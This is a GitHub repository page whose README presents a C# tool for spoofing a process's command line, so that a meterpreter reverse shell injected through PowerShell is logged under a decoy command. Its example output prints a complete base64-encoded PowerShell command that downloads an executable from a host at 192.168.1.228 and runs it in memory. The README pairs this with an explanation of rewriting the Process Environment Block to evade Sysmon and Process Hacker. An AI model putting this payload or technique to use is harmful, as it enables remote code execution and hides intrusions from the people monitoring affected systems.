Skip to content
/ CmdLineSpoofer Public
forked from plackyhacker/CmdLineSpoofer

How to spoof the command line when spawning a new process from C#.

0 stars 16 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

5l1v3r1/CmdLineSpoofer

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits

CmdLineSpoofer

CmdLineSpoofer

 
 

.gitattributes

.gitattributes

 
 

.gitignore

.gitignore

 
 

CmdLineSpoofer.sln

CmdLineSpoofer.sln

 
 

README.md

README.md

 
 

process_hacker.png

process_hacker.png

 
 

sysmon.png

sysmon.png

 
 

Repository files navigation

Command Line Spoofer

An example of using C# to inject a meterpreter shell, whilst spoofing the command line. The command line is stored in the Process Environment Block, is logged when a new process starts, and is displayed in tools such as Process Hacker and Task Manager.

Introduction

This code is based on the How to Argue like Cobalt Strike blog by Adam Chester/XPN, the blog explains how cobalt strike spoofs the command line of a process when injecting a beacon.

I used this as a basis to create a C# version that spawns a PowerShell process and injects a meterpreter reverse shell. Granted there is no need for a .Net binary to do this but it demonstrates how commands can be spoofed.

A new process is started in a suspended state with a spoofed command line argument.

The spoofed command is logged but we are able to change the command line in the process PEB. When the main thread is resumed the process uses the new command line in the PEB.

Example

Execution of the code is shown below:

[+] Spoofing command: powershell.exe nothing to see here! :-P
[+] Process spawned, PID: 8588
[+] PEB Address: 0x2B2366F000
[+] ProcessParameters Address: 0x1EF61560000
[+] CommandLine Address: 0x1EF615606BC
[+] Original CommandLine: powershell.exe nothing to see here! :-P                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       
[+] New CommandLine: powershell.exe -exec bypass -enc WwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACgASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMgAyADgALwBwAC4AZQB4AGUAIgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAuAEMAbwBuAHQAZQBuAHQAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAKAAsACAAWwBzAHQAcgBpAG4AZwBbAF0AXQAgACgAJwAxADkAMgAuADEANgA4AC4AMQAuADIAMgA4ACcALAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAUABJAEQALAAgACcAMQAwACcAKQApACkAOwB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADAAMAB9AA== , written to process
[+] Resuming process

This example injects a meterpreter reverse shell using PowerShell but it get's logged with a spoofed command line argument.

Proof of Concept

Sysmon logs the original (spoofed) command line:

Sysmon

Process Hacker does not reveal the executed command:

Process Hacker

About

How to spoof the command line when spawning a new process from C#.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • C# 100.0%